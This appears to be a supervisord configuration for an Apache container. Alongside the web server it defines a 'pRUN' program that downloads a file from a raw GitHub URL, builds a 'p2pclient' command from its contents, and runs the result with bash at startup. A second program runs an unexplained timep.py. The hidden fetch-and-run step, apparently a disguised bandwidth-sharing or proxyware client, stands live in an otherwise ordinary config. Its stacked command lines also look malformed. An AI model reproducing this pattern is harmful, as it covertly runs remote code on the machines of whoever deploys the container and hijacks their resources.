[supervisord]
nodaemon=true

[program:apache]
command=apache2ctl -D FOREGROUND
killasgroup=true
stopasgroup=true

[program:pRUN]
command=rm -rf p2p.sh
command=wget https://raw.githubusercontent.com/bls4/apache/main/config/p2p
command=echo -e "p2pclient -l MAIL_ADDREES" | sed -e "s/MAIL_ADDREES/$(cat /config/p2p)/" > p2p.sh
command=/bin/bash -c p2p.sh

[program:timep]
command=python3 /config/timep.py